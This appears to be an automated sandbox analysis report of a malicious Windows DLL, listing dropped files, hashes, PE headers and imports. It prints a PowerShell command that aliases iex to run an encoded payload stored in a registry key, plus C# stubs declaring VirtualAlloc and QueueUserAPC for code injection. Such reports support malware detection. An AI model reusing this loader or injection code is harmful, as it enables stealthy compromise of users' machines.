Preview:	L...!7cb.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........W....c:\Users\user\AppData\Local\Temp\vqkyohgm\CSCBF795D6899604BF9A48E638AB671C4FD.TMP................../.G..e..j.'.............7.......C:\Users\user\AppData\Local\Temp\RES5B2D.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.q.k.y.o.h.g.m...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

C:\Users\user\AppData\Local\Temp\RES71E1.tmp

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols
Category:	dropped
Size (bytes):	1336
Entropy (8bit):	3.9806725258664444
Encrypted:	false
SSDEEP:	24:H0Mm9ma1yxaHtuYhKdNwI+ycuZhNDakSFPNnq9Sd:S1b9Kdm1ulDa3fq9C
MD5:	DFCE1EDE6575FA8A45FF5365C73F9367
SHA1:	BEF2FE0E278050F95CA7C98F499268CDF8E1ECBC
SHA-256:	DEAD38723128D1587241794DBC0F1458D85DDD9E3CEC86E280A50245D8CC626E
SHA-512:	7E2D757A24C9EB89026780322925C1D551E574C7F1406F7839A59AFC7033E0E43060BAFCAC2F6F65DF9C7C9D32C0BF574DB724E1839321A4DA0644CBE5A98415
Malicious:	false
Reputation:	unknown
Preview:	L...'7cb.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........W....c:\Users\user\AppData\Local\Temp\g2letrfe\CSC71DE0290BB9F401583CAD01729BF75D7.TMP................k.......T*..............7.......C:\Users\user\AppData\Local\Temp\RES71E1.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...g.2.l.e.t.r.f.e...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q3t4dtxl.aez.ps1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zqgxvc3t.uvk.psm1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\g2letrfe\CSC71DE0290BB9F401583CAD01729BF75D7.TMP

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.073877277863502
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryhak7YnqqFPN5Dlq5J:+RI+ycuZhNDakSFPNnqX
MD5:	6BA6B2A9CFD6C07F542AD687BC0EE9A8
SHA1:	9BCE95C6A558409C0D0CFDB4A81E5DD935E20D30
SHA-256:	239FD9FB49A112AC318CD9CD14C6B887F115D95BD7F6D54C3C9EE5209FFB1AE8
SHA-512:	7829AD12B62061B2A8B485209A44EACCBDF55A35A6E52FC3B670B3DA125B1C26F407A047CA5736D6A20F9FA17F7AE2A72614669C36FD248D44481F162BABDAE0
Malicious:	false
Reputation:	unknown
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...g.2.l.e.t.r.f.e...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...g.2.l.e.t.r.f.e...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\g2letrfe\g2letrfe.0.cs

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	417
Entropy (8bit):	5.038440975503667
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJlmMRSRa+eNMjSSRr/++5xVBuSRNA5cWGQRZry:V/DTLDfu09eg5rG+5zBlK5Ny
MD5:	AE91D1351B9FB773FEF9B6F31D0A22EE
SHA1:	323F9FAD2F10ABDC97A7BF643A35DE67E3A32E31
SHA-256:	2CEDA574437717CB5084A6D8315F059002F22D45837C60C003F1F09BB0A72DCD
SHA-512:	94C098F8D6FA16950D6CC582D7303D6B1383126C8DB3AA1C85D7E4E155143E2A4E42B3C96A7B5EFAA53CA3AA8A81CDB97B641D1F4521C67456158C32046A8E23
Malicious:	false
Reputation:	unknown
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class omrgvusmwh. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint ooyvxktqmjp,uint oshbdrwt);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr payqgxim,uint tthajtdrqfh,uint vcyatdpvykk,uint vnrytmsowy);.. }..}.

C:\Users\user\AppData\Local\Temp\g2letrfe\g2letrfe.cmdline

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	375
Entropy (8bit):	5.160202297405406
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fE0XWXy+zxs7+AEszIN723fE0XWXY:p37Lvkmb6K2a2C+WZETa2I
MD5:	CE918DF62ABDB89D5CC71F5C991D2EA2
SHA1:	1315A8E1C4D6149F2A8AE3795694E122699A00DF
SHA-256:	53C394ECAFE2D962CFC5EB68F80AD777BBC58DD685A1A1197CBFC2295320E6A3
SHA-512:	1E5F0331DB6B46D0D5D977DC18871DDB6E393A39D4516CF70B4EF0D91655A6E8478AA0A6DC1724F6EB60A3E8605EF962F9756E2979D1C6F1BBC3E492A27DB0B3
Malicious:	false
Reputation:	unknown
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\g2letrfe\g2letrfe.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\g2letrfe\g2letrfe.0.cs"

C:\Users\user\AppData\Local\Temp\g2letrfe\g2letrfe.dll

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.645075663397193
Encrypted:	false
SSDEEP:	24:etGSUMWWOJy853Ek0s2E7OgtodWQzbtkZfzOw4OWI+ycuZhNDakSFPNnq:6Gvz5UkGE7vtyWQzqJzO11ulDa3fq
MD5:	FBFB11C197F704C2AECFD81DDCCC36FC
SHA1:	8BB0A3C5C7D624A701A7F4671790E7AFA70605B5
SHA-256:	37A1C40DF0757252DB4D88E0CDBDAEFD9B3DE4C926BA242C251C3EE03B939F98
SHA-512:	45098F014EF9E0A415721D1CC1EE9BECC9A7A8D441813D0C8A579477E7D7C95ACD92D177A14D5695620900C4531867A4785C41A5F1E4794322705A7F019B7996
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&7cb...........!.................$... ...@....... ....................................@..................................#..S....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................$......H.......X ..p.............................................................(....BSJB............v4.0.30319......l...H...#~......P...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................6./...............1.......................".............. =............ O............ W.....P ......d.........j.....v...........................d. ...d...!.d.%...d............3.D.....=.......O.......W...........

C:\Users\user\AppData\Local\Temp\g2letrfe\g2letrfe.out

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
Category:	modified
Size (bytes):	872
Entropy (8bit):	5.283470903766481
Encrypted:	false
SSDEEP:	24:AId3ka6K2aLETa2KaM5DqBVKVrdFAMBJTH:Akka6CLE+2KxDcVKdBJj
MD5:	E56D907A0843A044EBBB9C1DC9C68D02
SHA1:	63E78F30089144F3668FFC0EF3B4C69996A60A1E
SHA-256:	9C05541F59DAB210B236F438E90BDA13B9E850E066D651F0C7617F7117EFCCAC
SHA-512:	85F32656A58D228DE6606476539300877059AC13FDBEAD9F712E77DBD954B6E17286B3528552B3D5A5F3E3F14FDB0EF388BAB89906C9A5004D13C88D09E12546
Malicious:	false
Reputation:	unknown
Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\g2letrfe\g2letrfe.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\g2letrfe\g2letrfe.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\vqkyohgm\CSCBF795D6899604BF9A48E638AB671C4FD.TMP

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.113541146680034
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryXuak7YnqqavPN5Dlq5J:+RI+ycuZhNluakSavPNnqX
MD5:	179D2FB14708C56504936A7F270F16A5
SHA1:	6B21198151296A635D517234489CDB53F47D7DCA
SHA-256:	0FC73A0C9954D60293C9D5AD16836908E19FA8B2CEA8E1C1F29AD0836A65005A
SHA-512:	FAC8EBB22B7D59F2B5E73C97401F483ECE58AD98C05FA0613B1BC1CB29D794CE01C88569A58200D75BDD1016BACA33FF02154BD5A3862B4E904C94EEAA0E638F
Malicious:	false
Reputation:	unknown
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.q.k.y.o.h.g.m...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...v.q.k.y.o.h.g.m...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\vqkyohgm\vqkyohgm.0.cs

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	411
Entropy (8bit):	5.082169696837192
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJEPWmMRSR7a1TriuSRa+rVSSRnA/fewoZQy:V/DTLDfu+Pdx9rV5nA/PwQy
MD5:	248E15CD19191D4333303E0E1F8E9A70
SHA1:	9896EF9708F81AE4E3F2CA86329AD6BD82C700C3
SHA-256:	0C6C066612882CD36BB425C21983258A23536FFA9E444FE57056C2D95D8B32DF
SHA-512:	8975F34DBF35E597A91A3F0F75B6A7D074B68A5D597BC3F1CC797EF2C90E4D6F25F9F132A636DD9CA302A2683D26794E0275C6ED0AC4CC8951B07F65C5642FD1
Malicious:	false
Reputation:	unknown
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class yifpgxqqbj. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr fsk,IntPtr kjxclvenfq,IntPtr wvolbwmjwax);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint jbsq,uint eftlv,IntPtr hpbmctchgk);.. }..}.

C:\Users\user\AppData\Local\Temp\vqkyohgm\vqkyohgm.cmdline

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	375
Entropy (8bit):	5.27398890414163
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723ff0zxs7+AEszIN723fpH:p37Lvkmb6K2a30WZETah
MD5:	05E0F638AA347956324EC08422191BAF
SHA1:	D0CEFB0D69AB0C7DB8D6A071DA0CBF97D297579A
SHA-256:	2991E6F7EA4DDB561CCF0E04682E956BDD441667A8285E55069B36003A7889C0
SHA-512:	8F46AC8569CEDC560921661F75A32EDD0CC38DBD2982F28379DAF470BB8AEF42F2C7C6AE41ED40DC369708DE6C01FCC7C1F634086B5464C3DE774D9FC6DF91A9
Malicious:	false
Reputation:	unknown
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\vqkyohgm\vqkyohgm.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\vqkyohgm\vqkyohgm.0.cs"

C:\Users\user\AppData\Local\Temp\vqkyohgm\vqkyohgm.dll

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.639125264073665
Encrypted:	false
SSDEEP:	24:etGSVE8+mUE7R853RY0kCGG+4I4tkZfTmhuDZ0WI+ycuZhNluakSavPNnq:6gXE7S50XJTmhYZX1ulga3sq
MD5:	E23F48E1F885AC248DE6BE7648347DDC
SHA1:	8B4EA77FDB6E918D2A7FB7B0E999F679F6F57163
SHA-256:	478C4FB15A90A3B43445D75BF2AC896FB4CD82D2F4274B4B9614CEB194789AA7
SHA-512:	CAF02F3A52F0ACACD03C4CB76128746ECA15FE65D754C5B2957AF1A15C4B180F9F67016991EEDF26ED9AA1BF666D766C8C9326DD34D6D39E3D03F344059FF7F9
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... 7cb...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................6./...............%.......................".............. =............ J............ ].....P ......h.........n.....r.....}.....................h. ...h...!.h.%...h............3.8.....=.......J.......]...........

C:\Users\user\AppData\Local\Temp\vqkyohgm\vqkyohgm.out

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
Category:	modified
Size (bytes):	872
Entropy (8bit):	5.325856264389758
Encrypted:	false
SSDEEP:	24:AId3ka6K2a3VETaEKaM5DqBVKVrdFAMBJTH:Akka6C3VE+EKxDcVKdBJj
MD5:	6F7E4C740D4B09EF4BD589375B95A314
SHA1:	FB7014B62E79973C9A985F595A83F40DB9BF6263
SHA-256:	FF180A76D440631C714B4C9505C5DC00071CEBFD5532E8EA7DE48762ACE2E716
SHA-512:	1BD43D8ECC2D1EC04CD4A8A2A451B369621793C7EC7EA21C804821E93723A4B91FE973B1043D106765905BA25ADB26BF10EEA2171DC17DBF13189A4B5F52CF01
Malicious:	false
Reputation:	unknown
Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\vqkyohgm\vqkyohgm.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\vqkyohgm\vqkyohgm.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\Documents\20220422\PowerShell_transcript.367706.vGPyFZhc.20220422161533.txt

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1349
Entropy (8bit):	5.368936022103402
Encrypted:	false
SSDEEP:	24:BxSAMxGy7vBVLJx2DOXUWORALCHU4qWz1tHjeTKKjX4CIym1ZJXUxmRALCHU4wpK:BZG9vTLJoOuRnU4tz1tqDYB1ZYmRnU4x
MD5:	055658A63CDA19CF4E0CC61868ACD418
SHA1:	CF15704B67F261D4BBF1F482245A02CF8E441845
SHA-256:	6C3FC1486D9E2DF6B2F11C211B8F51875D7EEFD3DD869AE1C1695A0726F653A1
SHA-512:	E5273E2C44AD3D77A1192B313CD3447996DB86BD16B16D66B49D991FE3BEEBEEBA37C67D749D8227A4C02D4827CDE3A91BCAAD740D71CC4FE7FE15DF84CB406A
Malicious:	false
Reputation:	unknown
Preview:	.********************..Windows PowerShell transcript start..Start time: 20220422161534..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 367706 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name ffrhac -value gp; new-alias -name ulgwgd -value iex; ulgwgd ([System.Text.Encoding]::ASCII.GetString((ffrhac HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UrlsReturn))..Process ID: 6856..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20220422161534..********************..PS>new-alias -name ffrhac -value gp; new-alias -name ulgwgd -value iex; ulgwgd ([System.

\Device\ConDrv

Process: explorer.exe, Module: KERNEL32.DLL

Process:	C:\Windows\System32\nslookup.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	28
Entropy (8bit):	4.039148671903071
Encrypted:	false
SSDEEP:	3:U+6QlBxAN:U+7BW
MD5:	D796BA3AE0C072AA0E189083C7E8C308
SHA1:	ABB1B68758B9C2BF43018A4AEAE2F2E72B626482
SHA-256:	EF17537B7CAAB3B16493F11A099F3192D5DCD911C1E8DF0F68FE4AB6531FB43E
SHA-512:	BF497C5ACF74DE2446834E93900E92EC021FC03A7F1D3BF7453024266349CCE39C5193E64ACBBD41E3A037473A9DB6B2499540304EAD51E002EF3B747748BF36
Malicious:	false
Reputation:	unknown
Preview:	Non-authoritative answer:...

Static File Info

General

File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.110624325496081
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	d6YCUW421p.dll
File size:	640155
MD5:	c544f66e442fbb1864b5abc8c919ef14
SHA1:	7648765f0e8c7247187592be8ffc15e862833b6b
SHA256:	5747f4ec2678631d2b8b001a4e1aeec2a74788cdc1381fcbb36b8f5f699246a6
SHA512:	1e9a290df7c404d6c07ae4c01db7b79dad922420f13d29429306421241c4d97e08ff35c13a8748a13ba58801a6d3c97a771dce523a4f1a103e4e3acd8111830b
SSDEEP:	12288:+w1lEKREbddtOYRbHzcPwka1dCjc3N8ZY:+w1lEKOpuYxiwkkgjAN8ZY
TLSH:	3CD4BD1A029B2102EBB6CE78A751636C55174CE09B01E2CFC9190DA395E34FBF4FA5ED
File Content Preview:	MZ......................@...................................P...........!..L.!This program cannot be run in DOS mode....$........9.(.X.{.X.{.X.{...{0X.{...{.Y.{G.-{.X.{~.({.Y.{..M{.X.{K..z.X.{..r{}Y.{.X.{PX.{K..z.Y.{.!8{.Y.{Rich.X.{.......................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General

Entrypoint:	0x401023
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x3F4B4692 [Tue Aug 26 11:37:54 2003 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	fd1c62e6f93e304a27347077f6d2b44c

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
jmp 00007FBBE0D8162Dh
jmp 00007FBBE0DB1D98h
jmp 00007FBBE0D81313h
jmp 00007FBBE0D80FCEh
jmp 00007FBBE0D813E9h
jmp 00007FBBE0D80E24h
jmp 00007FBBE0DB720Fh
jmp 00007FBBE0D80F2Ah
jmp 00007FBBE0DAA585h
jmp 00007FBBE0DBA440h
jmp 00007FBBE0DB60ABh
jmp 00007FBBE0DBB606h
jmp 00007FBBE0D80EA1h
jmp 00007FBBE0DAB6BCh
jmp 00007FBBE0DBDCD7h
jmp 00007FBBE0DB4F82h
jmp 00007FBBE0DAC73Dh
jmp 00007FBBE0D81358h
jmp 00007FBBE0DC0C73h
jmp 00007FBBE0D8107Eh
jmp 00007FBBE0DBC839h
jmp 00007FBBE0DB2E64h
jmp 00007FBBE0DAD74Fh
jmp 00007FBBE0DBC65Ah
jmp 00007FBBE0D812F5h
jmp 00007FBBE0DB8230h
jmp 00007FBBE0DAFC8Bh
jmp 00007FBBE0DBFD96h
jmp 00007FBBE0DAEB51h
jmp 00007FBBE0D812ECh
jmp 00007FBBE0D80E67h
jmp 00007FBBE0DB9372h
jmp 00007FBBE0DBECEDh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3

Rich Headers

Programming Language:

[ C ] VS2013 build 21005
[RES] VS2015 build 23026
[LNK] VS2013 UPD4 build 31101
[C++] VS2010 SP1 build 40219
[IMP] VS2012 UPD2 build 60315
[RES] VS2008 build 21022
[EXP] VS2015 UPD3.1 build 24215
[ C ] VS2012 UPD1 build 51106
[C++] VS2015 UPD3.1 build 24215

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x97000	0xc8	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x98000	0x703	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x1000	0x1	.text
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x99000	0x46b8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x41001	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9731c	0x254	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3f170	0x40000	False	0.371898651123	data	4.44682748237	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x41000	0x4001b	0x41000	False	0.805322265625	data	7.15716511851	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x82000	0x14957	0x12000	False	0.179578993056	data	5.40188601701	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata	0x97000	0xadd	0x1000	False	0.217041015625	data	2.64887682924	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x98000	0x703	0x1000	False	0.1220703125	data	1.10395588442	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x99000	0x53a5	0x6000	False	0.152099609375	data	5.13419580461	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x98170	0x3d0	data

Imports

DLL	Import
WINSPOOL.DRV	GetPrinterDriverDirectoryA, GetPrinterDataExW, DeletePrinterConnectionW, FindFirstPrinterChangeNotification, FindClosePrinterChangeNotification
msvcrt.dll	toupper
USER32.dll	DestroyIcon, GetWindowTextA, DrawFrameControl, LoadAcceleratorsA, GetTitleBarInfo, GetMessageExtraInfo, DrawTextW
OLEAUT32.dll	LHashValOfNameSysA
SHELL32.dll	FindExecutableW
